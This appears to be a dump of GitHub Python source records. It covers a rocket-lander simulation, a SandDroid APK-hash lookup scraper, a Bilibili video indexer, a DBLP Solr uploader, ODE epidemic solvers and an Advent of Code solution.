self.mass = float(3000)\n self.angle = float(90)\n self.com = (self.width/2, self.height/1.5)\n self.omega = float(0)\n self.v_y = float(0)\n self.v_x = float(0)\n self.thrust = float(30000)\n self.thrust_angle = float(math.radians(self.angle)+math.radians(0))\n self.rapid_unscheduled_disassembly = False\n\n\n def position(self, time):\n self.v_y = ((-self.thrust/self.mass * math.cos(self.thrust_angle)) + 9.8) * time\n self.v_x = (-self.thrust/self.mass*math.sin(self.thrust_angle)) * time\n self.x += self.v_x * time + (1/2) * ((-self.thrust/self.mass) * math.sin(self.thrust_angle)) * time**2\n self.y += (self.v_y * time + (1/2) * ((-self.thrust/self.mass) * math.cos(self.thrust_angle) + 9.8) * time**2)\n return self.x, self.y\n\n def angle_pos(self, time):\n # solid cylinder: mr^2/2\n inertia = (self.mass * (self.width/2)**2)/2 \n d = self.height - self.com[1]\n torque = -(d * self.thrust * math.sin(self.thrust_angle))\n alpha = torque/inertia\n self.omega += alpha * time\n return None\n\ndef draw_window(rocket, time):\n pos_x, pos_y = rocket.position(time)\n# print(f\"v_x: {rocket.v_x}, v_y: {rocket.v_y}\")\n# print(f\"x: {pos_x}, y: {pos_y}\")\n WIN.fill(background)\n WIN.blit(pygame.transform.rotate(rocket.img, rocket.angle), (pos_x, pos_y))\n pygame.draw.circle(rocket.img, (255, 0, 0), (rocket.com[0], rocket.com[1]), 4)\n# print(f\"com: {pos_x+rocket.com[0], pos_y+rocket.com[1]}\")\n pygame.display.update()\n\n\ndef main():\n\n pygame.display.set_caption(\"LandAI\")\n\n rocket = Rocket(ROCKET, ROCKET_POS, ROCKET_WIDTH, ROCKET_HEIGHT)\n\n clock = pygame.time.Clock()\n\n run = not rocket.rapid_unscheduled_disassembly\n\n while run:\n clock.tick(FPS)\n time = float(pygame.time.get_ticks()/1000)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False \n\n draw_window(rocket, time)\n\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"notsoharshdevisha/TVC-AI-Lander","sub_path":"mygame.py","file_name":"mygame.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30355655903","text":"import requests\nimport os\nimport time\n\nfrom get_conf import GetConf\nfrom sanddroid_db import SanddroidMysqlClient\n\n\n# 备案查询\nclass Sanddroid:\n def __init__(self, conf):\n self.conf = conf\n self.mysql_client = SanddroidMysqlClient(conf)\n self.url = 'http://sanddroid.xjtu.edu.cn/apk_table_info'\n\n self.headers = {\n 'Referer': 'http://sanddroid.xjtu.edu.cn/',\n 'Host': 'sanddroid.xjtu.edu.cn',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',\n }\n\n def parse_data(self, md5, json_data):\n indate = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(json_data[0])))\n package_name = json_data[2]\n result = '没有发现病毒' if json_data[3] == 'UnDetected' else json_data[3]\n score = json_data[4]\n self.mysql_client.insert_sanddroid((md5, package_name, result, score, indate, ))\n\n def get_json_data(self, md5):\n if self.mysql_client.select_sanddroid((md5,)):\n with open('log/info.txt', 'a') as f_info:\n txt = md5 + ':记录已存在,跳过爬取!\\n'\n f_info.write(txt)\n return None\n form_data = {\n 'sEcho': '15',\n 'iColumns': '5',\n 'sColumns': '',\n 'iDisplayStart': '0',\n 'iDisplayLength': '50',\n 'mDataProp_0': '0',\n 'mDataProp_1': '1',\n 'mDataProp_2': '2',\n 'mDataProp_3': '3',\n 'mDataProp_4': '4',\n 'iSortCol_0': '1',\n 'sSortDir_0': 'asc',\n 'iSortingCols': '1',\n 'bSortable_0': 'true',\n 'bSortable_1': 'true',\n 'bSortable_2': 'true',\n 'bSortable_3': 'true',\n 'bSortable_4': 'true',\n 'is_search': 'true',\n 'apk_md5': md5,\n 'cert_sha1': '',\n 'package': '',\n 'malware_name': '',\n }\n json_data = requests.post(self.url, headers=self.headers, data=form_data).json()\n if not json_data['aaData']:\n with open('log/err.txt', 'a') as f_err:\n txt = md5 + ':apk尚无分析记录!\\n'\n f_err.write(txt)\n return None\n\n return json_data\n\n def spider(self):\n print('开始 http://sanddroid.xjtu.edu.cn 爬取...')\n if not os.path.exists('log'):\n os.mkdir('log')\n md5 = ''\n while True:\n try:\n md5 = self.mysql_client.select_apk_black_list_info((2,))[0][0]\n if not md5:\n break\n print(md5)\n time.sleep(2)\n json_data = self.get_json_data(md5)['aaData']\n if json_data:\n self.parse_data(md5, json_data[0])\n with open('log/result.txt', 'a') as f_result:\n txt = md5 + ':完成查询!\\n'\n f_result.write(txt)\n self.mysql_client.update_apk_black_list((md5, 2,))\n except Exception as err:\n with open('log/err.txt', 'a') as f_err:\n txt = md5 + ' ' + str(err) + '\\n'\n f_err.write(txt)\n self.mysql_client.update_apk_black_list((md5, 2))\n\n print('http://sanddroid.xjtu.edu.cn 爬取完成!')\n\n\ndef main():\n conf = GetConf('conf.xml')\n sanddroid = Sanddroid(conf)\n sanddroid.spider()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"smallmeet/fangzhen","sub_path":"sanddroid/sanddroid-bak.py","file_name":"sanddroid-bak.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21521316614","text":"import frappe\nfrom frappe.permissions import add_user_permission, clear_user_permissions_for_doctype\nfrom pypika.functions import Length\n\nfrom landa.organization_management.doctype.member_function.member_function import (\n\tapply_active_member_functions,\n)\n\n\ndef execute():\n\ttable = frappe.qb.DocType(\"LANDA Member\")\n\tfor member_name, user, organization in (\n\t\tfrappe.qb.from_(table)\n\t\t.select(table.name, table.user, table.organization)\n\t\t.where(Length(table.organization) > 7)\n\t\t.where(table.user.notnull())\n\t\t.where(table.user != \"\")\n\t\t.run()\n\t):\n\t\tclear_user_permissions_for_doctype(\"Organization\", user)\n\t\tadd_user_permission(\"Organization\", organization, user, ignore_permissions=True)\n\t\tapply_active_member_functions({\"member\": member_name})\n","repo_name":"alyf-de/landa","sub_path":"landa/patches/restrict_members_to_local_group.py","file_name":"restrict_members_to_local_group.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"15484359519","text":"import numpy as np\nfrom scipy.stats import norm\n\n# Известно, что рост футболистов в сборной распределен нормально\n# с дисперсией генеральной совокупности, равной 25 кв.см. Объем выборки равен 27,\n# среднее выборочное составляет 174.2. Найдите доверительный интервал для математического\n# ожидания с надежностью 0.95.\n\nM = 174.2\nstd = np.sqrt(25)\nn = 27\n# Используем Z табл. т.к. сигма можно вычислить из данной дисперсии\n# a = 97.5% (2.5 + 95%)\nZ = norm.ppf(0.975)\n\nconfidence_interval_a = M - Z * (std / np.sqrt(n))\nconfidence_interval_b = M + Z * (std / np.sqrt(n))\n# Ответ: (172.31;176.08)\n","repo_name":"asemeniuc23/machine_learning_study","sub_path":"MatStat/homework_6/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25416194602","text":"import network \nstation = network.WLAN(network.STA_IF) # client, not AP\n\naddress = ''\ndef connect():\n import config_esp32\n global address\n\n config = config_esp32.read_config()\n essid = config['essid']\n psk = str(config['psk'])\n address = config['address']\n\n print('wifi connecting to', essid)\n station.active(False)\n station.active(True) # enable wifi\n if psk:\n print('connect to', essid, psk)\n station.connect(essid, psk)\n else:\n station.connect(essid)\n\nimport time\nconnected = False, time.time()\nconnect()\n\ndef poll(client):\n global connected\n isconnected = station.isconnected()\n if connected[0] == isconnected: # no change\n if not isconnected and time.time() - connected[1] > 8:\n print('wifi timeout, reconnecting wifi', time.time() - connected[1])\n connect()\n connected = isconnected, time.time()\n return isconnected\n connected = isconnected, time.time()\n if connected:\n if address:\n host = address\n else:\n addrs = station.ifconfig()\n print('wifi connection success', addrs)\n host = addrs[3]\n\n if client.host != host:\n print('wifi connecting to pypilot at', host)\n client.disconnect()\n client.host = host\n else: # disconnected\n print('wifi disconnected')\n client.disconnect()\n return connected\n","repo_name":"FredericGuilbault/pypilot","sub_path":"hat/wifi_esp32.py","file_name":"wifi_esp32.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"43445376217","text":"import json\nimport sys\nimport time\n\nimport requests\n\nsession = requests.Session()\nsession.headers[\n \"User-Agent\"] = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\"\n\n\ndef provide() -> dict:\n page = 1\n global session\n r = session.get(\"https://www.bilibili.com/\")\n\n if \"debug\" in sys.argv:\n print(r.status_code)\n print(session.cookies.get_dict())\n\n while True:\n data = {\n \"search_type\": \"video\",\n \"keyword\": \"同步至节奏医生视频合集\" if \"debug\" not in sys.argv else \"节奏医生\",\n \"order\": \"pubdate\",\n \"tids\": 4,\n \"page\": page,\n }\n page += 1\n\n result = session.get(\"https://api.bilibili.com/x/web-interface/search/type\", params=data).json()\n if result[\"code\"] != 0:\n raise ValueError(f\"Result code {result['code']}: {result['message']}\")\n\n for item in result[\"data\"][\"result\"]:\n yield item\n\n\ndef load_existed_authors() -> set:\n try:\n file_name = \"../docs/authors.txt\" if \"debug\" not in sys.argv else \"debug_authors.txt\"\n authors = set()\n with open(file_name, \"rt\", encoding=\"utf-8\") as f:\n for line in f.read().splitlines():\n if len(line) <= 0 or line.isspace() or line.startswith(\"#\"):\n continue\n\n authors.add(int(line.split('|')[1]))\n return authors\n except FileNotFoundError:\n return set()\n\n\ndef load_config() -> dict:\n try:\n with open(\"config.json\", \"rt\", encoding=\"utf-8\") as f:\n return json.load(f)\n except FileNotFoundError:\n return {\n \"timestamp\": int(time.time()) - 60 * 60 * 24,\n }\n\n\ndef save_config(config: dict):\n with open(\"config.json\", \"wt\", encoding=\"utf-8\") as f:\n json.dump(config, f)\n\n\nif __name__ == '__main__':\n authors_existed = load_existed_authors()\n config = load_config()\n\n author_file_name = \"../docs/authors.txt\" if \"debug\" not in sys.argv else \"debug_authors.txt\"\n video_file_name = \"../docs/videos.txt\" if \"debug\" not in sys.argv else \"debug_videos.txt\"\n with open(author_file_name, \"at\", encoding=\"utf-8\") as author_file, open(video_file_name, \"at\",\n encoding=\"utf-8\") as video_file:\n for video in provide():\n if video[\"senddate\"] < config[\"timestamp\"]:\n break\n\n if \"tag\" not in video[\"hit_columns\"]:\n continue\n\n author_id = video[\"mid\"]\n if author_id not in authors_existed:\n author_name = video[\"author\"].replace(\"|\", \"·\")\n print(f\"Found new author {author_name} with id {author_id}.\")\n author_file.write(f\"{author_name}|{author_id}\\n\")\n authors_existed.add(author_id)\n\n bvid = video[\"bvid\"]\n video_name = video[\"title\"].replace(\"\", \"\").replace(\"\", \"\").replace(\"|\", \"·\")\n\n print(f\"Found new video {video_name} with bvid {bvid} and author {author_id}.\")\n video_file.write(f\"{author_id}|{bvid}|{video_name}\\n\")\n\n if \"debug\" not in sys.argv:\n config[\"timestamp\"] = int(time.time())\n save_config(config)\n","repo_name":"RDCN-Community-Developers/bv.rdlevel.cn","sub_path":"updater/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29937619231","text":"import time\nimport sys\n\ndef factorial(n):\n response = 1\n\n while n > 1:\n response *= n\n n -= 1\n\n return response\n\ndef factorial_recursive(n):\n if n == 1:\n return 1\n\n return n * factorial_recursive(n - 1)\n\n\nif __name__ == '__main__':\n n = 2500\n sys.setrecursionlimit(n + 10)\n\n starting_time = time.time()\n factorial(n)\n end_time = time.time()\n print(f\"Execution time with bucle\\t{end_time - starting_time}\")\n\n startin_time = time.time()\n factorial_recursive(n)\n end_time = time.time()\n print(f\"Execution time with recusive\\t{end_time - starting_time}\")","repo_name":"AlbertoNM/poo_algorithms_py","sub_path":"complejidad_algoritmica/complejidad_algoritmica.py","file_name":"complejidad_algoritmica.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42388725475","text":"from solr.instances import get_session\nfrom multiprocessing import Pool, cpu_count\nimport itertools\nimport json\nfrom datetime import datetime\nfrom data import batch_jsonl_parsed, do_parallel\nimport re\nfrom data.dblp.stream_update import generate_events\nfrom data.dblp.convert_to_jsonl import build_upload_document, yield_from_gzip\nfrom pprint import pprint\nfrom solr_config import COLLECTION_DEFAULTS\nfrom solr.configsets import get_config\n\nnew_names = {\n 'pub_type': 'doc_type',\n}\ncount_fields = ['author']\nconvert_to_list = ['author', 'ee']\ndoi_re = re.compile(r'.*/(10.[0-9]+(\\.[0-9]+)?/.*)')\n\n\ndef as_list(parsed, name):\n if name not in parsed:\n return\n if type(parsed[name]) is list:\n return\n l = parsed.pop(name)\n parsed[name] = [l]\n\n\ndef rename(dic, old, new):\n try:\n dic[new] = dic.pop(old)\n except KeyError:\n pass\n\n\ndef find_doi(inp):\n for url in inp:\n if 'doi' not in url:\n continue\n match = doi_re.match(url)\n if not match:\n continue\n groups = match.groups()\n if 0 < len(groups):\n return groups[0]\n return None\n\n\ndef parse_json(line):\n try:\n parsed = json.loads(line)\n except json.decoder.JSONDecodeError as e:\n raise Exception(f'line: {line}')\n # parsed = line\n # dblp-2019-02-01.xml.gz contains one set with a duplicate year field\n # this will replace the list with the first value\n try:\n if isinstance(parsed['year'], list):\n parsed['year'] = parsed['year'][0]\n except KeyError:\n pass\n for old, new in new_names.items():\n rename(parsed, old, new)\n for field in convert_to_list:\n as_list(parsed, field)\n for field in count_fields:\n parsed[f'{field}_count'] = len(parsed.get(field, []))\n doi = find_doi(parsed.get('ee', []))\n if doi is not None:\n parsed['doi'] = doi\n\n # for url in parsed.get('ee', []):\n # u = urlparse(url)\n # if not u or not u.hostname:\n # continue\n # if u.hostname.endswith('doi.org'):\n # parsed['doi'] = u.path[1:]\n # break\n # elif u.hostname == 'doi.ieeecomputersociety.org':\n # parsed['doi'] = u.path[1:]\n # break\n\n # if parsed['key'] == 'series/ais/LimbasiyaA18':\n # interact('no doi?', local=locals())\n\n parsed['id'] = parsed.pop('key')\n return json.dumps(parsed)\n\n\ndef batch_jsonl(generator, batchsize):\n \"\"\"\n creates larger chunks from a genenerator function.\n\n :param generator: the generator function that yields lines of json\n :param batchsize: the maximum size of the batch\n :return: yields utf-8 encoded bytes\n \"\"\"\n with Pool(processes=cpu_count()) as pool:\n while True:\n batch = itertools.islice(generator, batchsize)\n batch = '\\n'.join(pool.imap(parse_json, batch))\n if 0 < len(batch):\n yield batch.encode('utf-8')\n else:\n break\n\n\ndef upload_parallel(generator, collection):\n with Pool(processes=cpu_count()) as pool:\n yield from pool.imap(collection.update.jsonl, generator)\n\n\ndef maybe_add_field(c, name: str, typ: str):\n response = c.schema.fields.get_single(name)\n if 200 != response.status_code:\n print(f'adding field {name}: {typ}:')\n print(c.schema.fields.add(name, typ).json())\n else:\n print(f'field {name} exists, skipping')\n\n\ndef main():\n alias = 'dblp'\n config_local = 'dblp'\n config_online = 'dblp'\n version = '2019-07-01'\n collection_name = '.'.join([alias, version])\n s = get_session('localhost', port=8984)\n collections = s.admin.collections.list().json()['collections']\n create = False\n if collection_name in collections:\n decide = input(f'collection {collection_name} exists, reset? [Y/n]')\n if decide in ['y', '']:\n create = True\n print('deleting collection')\n \"\"\" {\n 'responseHeader': {'status': 0, 'QTime': 201}, \n 'success': {\n 'solr2:8983_solr': {'responseHeader': {'status': 0, 'QTime': 19}}, \n 'solr0:8983_solr': {'responseHeader': {'status': 0, 'QTime': 20}}, \n 'solr1:8983_solr': {'responseHeader': {'status': 0, 'QTime': 20}}\n }\n } \n\n error = {\n 'responseHeader': {'QTime': 20, 'status': 400},\n 'Operation delete caused exception:': 'org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Could not find collection : dblp',\n 'error': {\n 'code': 400,\n 'metadata': [\n 'error-class',\n 'org.apache.solr.common.SolrException',\n 'root-error-class',\n 'org.apache.solr.common.SolrException'\n ],\n 'msg': 'Could not find collection : dblp'\n },\n 'exception': {\n 'msg': 'Could not find collection : dblp',\n 'rspCode': 400\n },\n }\n \"\"\"\n pprint(s.admin.collections.delete(collection_name).json())\n else:\n create = True\n\n create_cfg = False\n pprint(s.admin.configs.list().json())\n configsets = s.admin.configs.list().json()['configSets']\n if config_online in configsets:\n decide = input(f'config {config_online} exists, replace? [Y/n]')\n if decide in ['y', '']:\n print('deleting config')\n # {'responseHeader': {'status': 0, 'QTime': 99}}\n print(s.admin.configs.delete(config_online).json())\n else:\n create_cfg = True\n if create_cfg:\n print('sending latest config')\n # {'responseHeader': {'status': 0, 'QTime': 148}}\n print(s.admin.configs.upload(config_online, get_config(config_local)).json())\n if create:\n print('creating collection')\n \"\"\" {\n 'responseHeader': {'status': 0, 'QTime': 1888}, \n 'success': { \n 'solr1:8983_solr': {'responseHeader': {'status': 0, 'QTime': 1299}, 'core': 's2_shard3_replica_n4'}, \n 'solr2:8983_solr': {'responseHeader': {'status': 0, 'QTime': 1300}, 'core': 's2_shard2_replica_n2'}, \n 'solr0:8983_solr': {'responseHeader': {'status': 0, 'QTime': 1303}, 'core': 's2_shard1_replica_n1'}\n }\n } \"\"\"\n \"\"\"{\n 'responseHeader': {'status': 0, 'QTime': 1804}, \n 'failure': {\n 'solr2:8983_solr': \"org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException:Error from server at http://solr2:8983/solr: Error CREATEing SolrCore 'dblp_shard2_replica_n2': Unable to create core [dblp_shard2_replica_n2] Caused by: Unknown fieldType 'text_ngram' specified on field suggest_ngram\", \n 'solr1:8983_solr': \"org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException:Error from server at http://solr1:8983/solr: Error CREATEing SolrCore 'dblp_shard1_replica_n1': Unable to create core [dblp_shard1_replica_n1] Caused by: Unknown fieldType 'text_ngram' specified on field suggest_ngram\", \n 'solr0:8983_solr': \"org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException:Error from server at http://solr0:8983/solr: Error CREATEing SolrCore 'dblp_shard3_replica_n4': Unable to create core [dblp_shard3_replica_n4] Caused by: Unknown fieldType 'text_ngram' specified on field suggest_ngram\"\n }\n }\n \"\"\"\n create_params = COLLECTION_DEFAULTS.copy()\n create_params.update({\n 'name': collection_name,\n 'config_name': config_online,\n })\n pprint(s.admin.collections.create(**create_params).json())\n\n print('sending documents')\n c = s.collection(collection_name)\n maybe_add_field(c, 'doi', 'important_string')\n maybe_add_field(c, 'note', 'important_strings')\n maybe_add_field(c, 'author_count', 'pint')\n\n counter = 0\n batch_size = 10_000\n # batch_generator = batch_jsonl_parsed(build_upload_document(generate_events()), batch_size, parse_json)\n batch_generator = batch_jsonl_parsed(yield_from_gzip(), batch_size, parse_json)\n for response in upload_parallel(batch_generator, c): # 3922 batches with 10_000 size\n counter += 1\n # {'responseHeader': {'rf': 1, 'status': 0, 'QTime': 2499}}\n d = response.json()\n if d['responseHeader']['status'] != 0:\n print(f'{d}')\n # print(f'{counter:4d}', end=' ')\n # if counter % 10 == 0:\n # print()\n\n # r = s.collection(collection).update.jsonl(yield_from_gzip())\n # print(r.text)\n\n # print('sending commit')\n # r = s.collection(collection_name).update.xml('')\n # print(r.text)\n print('setting alias')\n pprint(s.admin.collections.createalias(alias, [collection_name]).json())\n\n\nif __name__ == '__main__':\n start = datetime.now()\n main()\n end = datetime.now()\n print(f'took {end - start}')\n","repo_name":"sonne-academic/solr-utils","sub_path":"data/dblp/upload_dblp.py","file_name":"upload_dblp.py","file_ext":"py","file_size_in_byte":9062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34672503340","text":"import numpy as np\nimport scipy.integrate as inte\n\ndef fun_s(pLambda, pBeta, pDelta, pMiu):\n return lambda s, e, i, l: pLambda - pBeta * s * (i + pDelta * l) - pMiu * s\n\n\ndef fun_e(pBeta, pP, pDelta, pR2, pMiu, pK, pR1):\n return lambda s, e, i, l: pBeta * (1 - pP) * s * (i + (pDelta * l)) + pR2 * i - (pMiu + pK * (1 - pR1)) * e\n\n\ndef fun_i(pBeta, pP, pDelta, pK, pR1, pGamma, pMiu, pD1, pFi, pR2):\n return lambda s, e, i, l: pBeta * pP * s * (i + pDelta * l) + pK * (1 - pR1) * e + pGamma * l - (pMiu + pD1 + pFi * (1 - pR2) + pR2) * i\n\n\ndef fun_l(pFi, pR2, pMiu, pD2, pGamma):\n return lambda s, e, i, l: pFi * (1 - pR2)*i - (pMiu + pD2+ pGamma)*l\n\n\ndef get_functions(var_bools, tipo, To, Tf, pLambda, pBeta, pDelta, pP, pMiu, pK, pR1, pR2, pFi, pGamma, pD1, pD2, t, h):\n funs = {\"S\": fun_s(pLambda, pBeta, pDelta, pMiu),\n \"E\": fun_e(pBeta, pP, pDelta, pR2, pMiu, pK, pR1),\n \"I\": fun_i(pBeta, pP, pDelta, pK, pR1, pGamma, pMiu, pD1, pFi, pR2),\n \"L\": fun_l(pFi, pR2, pMiu, pD2, pGamma)}\n\n ans = solve_function(tipo, funs, t, h, To, Tf)\n\n for key in var_bools:\n if var_bools[key] == 0:\n del funs[key]\n\n return ans\n\ndef solve_function(tipo, funs, t, h, To, Tf):\n initial = {\n \"S\": 0,\n \"E\": 0,\n \"I\": 0,\n \"L\": 0\n }\n if tipo == \"Euler adelante\":\n return sol_kutta2(funs, initial, t, h)\n if tipo == \"Euler atrás\":\n return sol_kutta2(funs, initial, t, h)\n if tipo == \"Euler modificado\":\n return sol_kutta2(funs, initial, t, h)\n if tipo == \"Runge–Kutta 2\":\n return sol_kutta2(funs, initial, t, h)\n if tipo == \"Runge–Kutta 4\":\n return sol_kutta4(funs, initial, t, h)\n if tipo == \"solve_ivp\":\n return solve_ip(funs, initial, t, h, To, Tf)\n\n\ndef sol_kutta2(funs, initial, t, h):\n RK2 = {\n \"S\": np.zeros(len(t)),\n \"E\": np.zeros(len(t)),\n \"I\": np.zeros(len(t)),\n \"L\": np.zeros(len(t))\n }\n\n for key in RK2:\n RK2[key][0] = initial[key]\n\n k_val1 = {}\n k_val2 = {}\n for i in range(1, len(t)):\n for key in RK2:\n k_val1[key] = funs[key](RK2[\"S\"][i-1],\n RK2[\"E\"][i-1],\n RK2[\"I\"][i-1],\n RK2[\"L\"][i-1])\n\n for key in RK2:\n k_val2[key] = funs[key](RK2[\"S\"][i-1] + k_val1[\"S\"]*h,\n RK2[\"E\"][i-1] + k_val1[\"E\"]*h,\n RK2[\"I\"][i-1] + k_val1[\"I\"]*h,\n RK2[\"L\"][i-1] + k_val1[\"L\"]*h)\n\n for key in RK2:\n RK2[key][i] = RK2[key][i - 1] + (h / 2) * (k_val1[key] + k_val2[key])\n\n return RK2\n\ndef sol_kutta4(funs, initial, t, h):\n RK4 = {\n \"S\": np.zeros(len(t)),\n \"E\": np.zeros(len(t)),\n \"I\": np.zeros(len(t)),\n \"L\": np.zeros(len(t))\n }\n\n for key in RK4:\n RK4[key][0] = initial[key]\n\n k_val1 = {}\n k_val2 = {}\n k_val3 = {}\n k_val4 = {}\n for i in range(1, len(t)):\n for key in RK4:\n k_val1[key] = funs[key](RK4[\"S\"][i-1],\n RK4[\"E\"][i-1],\n RK4[\"I\"][i-1],\n RK4[\"L\"][i-1])\n\n for key in RK4:\n k_val2[key] = funs[key](RK4[\"S\"][i-1] + 0.5 * k_val1[\"S\"] * h,\n RK4[\"E\"][i-1] + 0.5 * k_val1[\"E\"] * h,\n RK4[\"I\"][i-1] + 0.5 * k_val1[\"I\"] * h,\n RK4[\"L\"][i-1] + 0.5 * k_val1[\"L\"] * h)\n\n for key in RK4:\n k_val3[key] = funs[key](RK4[\"S\"][i - 1] + 0.5 * k_val2[\"S\"] * h,\n RK4[\"E\"][i - 1] + 0.5 * k_val2[\"E\"] * h,\n RK4[\"I\"][i - 1] + 0.5 * k_val2[\"I\"] * h,\n RK4[\"L\"][i - 1] + 0.5 * k_val2[\"L\"] * h)\n\n for key in RK4:\n k_val4[key] = funs[key](RK4[\"S\"][i-1] + k_val3[\"S\"] * h,\n RK4[\"E\"][i-1] + k_val3[\"E\"] * h,\n RK4[\"I\"][i-1] + k_val3[\"I\"] * h,\n RK4[\"L\"][i-1] + k_val3[\"L\"] * h)\n\n for key in RK4:\n RK4[key][i] = RK4[key][i - 1] + (h / 6) * (k_val1[key] + 2 * k_val2[key] + 2 * k_val3[key] + k_val4)\n\n return RK4\n\ndef solve_ip(funs, initial, t, To, Tf):\n FSystem = lambda t, y: [funs[\"S\"], funs[\"E\"], funs[\"I\"], funs[\"L\"]]\n return inte.solve_ivp(FSystem, [To, Tf], [initial[\"S\"], initial[\"E\"], initial[\"I\"], initial[\"L\"]],t_eval=t, method='RK45')","repo_name":"NicolasAbo17/ProgCientifica","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32691937218","text":"from core.variable import Equation\nfrom math import factorial\n\n\ndef taylor1D(equation, variable, point=0, steps=4):\n if isinstance(equation, Equation):\n polynomials = []\n for n in range(steps):\n if isinstance(variable, str):\n variable = equation.variables[variable]\n variable.value = point\n solution = equation.solve()\n polynomial = (solution / factorial(n)) * (variable - point)**n\n polynomials.append(polynomial)\n equation = equation.differentiate(variable.name)\n return sum(polynomials) if polynomials else 0\n\n\n","repo_name":"bstudiosoriginal/PhysicalSystemModeling","sub_path":"core/approximations/taylor.py","file_name":"taylor.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16291136336","text":"#!/usr/bin/env python3\n#pylint: disable=invalid-name, too-few-public-methods\n\nimport sys\nfrom enum import Enum, auto\n\n################################################################################\n# Classes\n################################################################################\nclass Square(Enum):\n OPEN_GROUND = auto()\n TREES = auto()\n LUMBERYARD = auto()\n\n def tick(self, row, col, grid):\n surrounding_squares = get_surrounding_squares(row, col, grid)\n if self.is_open_ground():\n num_wooded = count(surrounding_squares, Square.is_trees)\n return Square.TREES if num_wooded >= 3 else self\n if self.is_trees():\n num_lumberyards = count(surrounding_squares, Square.is_lumberyard)\n return Square.LUMBERYARD if num_lumberyards >= 3 else self\n if self.is_lumberyard():\n num_wooded = count(surrounding_squares, Square.is_trees)\n num_lumberyards = count(surrounding_squares, Square.is_lumberyard)\n return self if num_lumberyards >= 1 and num_wooded >= 1 else \\\n Square.OPEN_GROUND\n raise Exception('Invalid square type', self)\n\n def to_char(self):\n return \\\n '.' if self == Square.OPEN_GROUND else \\\n '|' if self == Square.TREES else \\\n '#'\n\n def is_open_ground(self):\n return self == Square.OPEN_GROUND\n\n def is_trees(self):\n return self == Square.TREES\n\n def is_lumberyard(self):\n return self == Square.LUMBERYARD\n\n @staticmethod\n def from_char(char):\n square = \\\n Square.OPEN_GROUND if char == '.' else \\\n Square.TREES if char == '|' else \\\n Square.LUMBERYARD if char == '#' else \\\n None\n if not square:\n raise Exception('Invalid square char', char)\n return square\n\ndef get_surrounding_squares(row, col, grid):\n num_rows, num_cols = len(grid), len(grid[0])\n indices = get_surrounding_indices(row, col, num_rows, num_cols)\n return [grid[i][j] for i, j in indices]\n\ndef get_surrounding_indices(row, col, num_rows, num_cols):\n min_row, max_row = max(0, row - 1), min(num_rows - 1, row + 1)\n min_col, max_col = max(0, col - 1), min(num_cols - 1, col + 1)\n return [(i, j)\n for j in range(min_col, max_col + 1)\n for i in range(min_row, max_row + 1)\n # don't include yourself\n if (i, j) != (row, col)]\n\n################################################################################\n# Solve\n################################################################################\nNUM_MINUTES = 1000000000\ndef solve(grid):\n board_to_index = {}\n index_to_board = {}\n for i in range(NUM_MINUTES):\n # if i % 10 == 0:\n # print('{} ({:.2f}%)'.format(i, i / NUM_MINUTES))\n serialized_grid = serialize_grid(grid)\n answer = find_answer(board_to_index, index_to_board, serialized_grid, i)\n if answer is not None:\n return answer\n index_to_board[i] = serialize_grid(grid), calculate_resource_value(grid)\n board_to_index[serialized_grid] = i\n grid = next_grid(grid)\n return calculate_resource_value(grid)\n\ndef find_answer(board_to_index, index_to_board, serialized_grid, index):\n if serialized_grid not in board_to_index:\n return None\n start, end = board_to_index[serialized_grid], index\n length = end - start\n answer_cycle_index = (NUM_MINUTES - start) % length\n answer_absolute_index = start + answer_cycle_index\n _, resource_value = index_to_board[answer_absolute_index]\n return resource_value\n\nSERIALIZED_SQUARE_LENGTH = 2\nSLICE_SIZE = 8\nSQUARES_PER_SLICE = SLICE_SIZE // SERIALIZED_SQUARE_LENGTH\ndef serialize_grid(grid):\n return bytes(serialize_square_slice(square_slice) for square_slice in\n slices_of(flatten_gen(grid), SQUARES_PER_SLICE))\n\ndef serialize_square_slice(square_slice):\n num = 0\n for i, square in enumerate(square_slice):\n num += serialize_square(square) << (2*i)\n return num\n\ndef serialize_square(square):\n if square.is_open_ground():\n return 0\n if square.is_lumberyard():\n return 1\n return 2\n\ndef slices_of(enumerable, length):\n cur = []\n for value in enumerable:\n cur.append(value)\n if len(cur) == length:\n yield cur\n cur = []\n if cur:\n yield cur\n\ndef flatten_gen(grid):\n for row in grid:\n for square in row:\n yield square\n\ndef next_grid(grid):\n return [[square.tick(i, j, grid) for j, square in 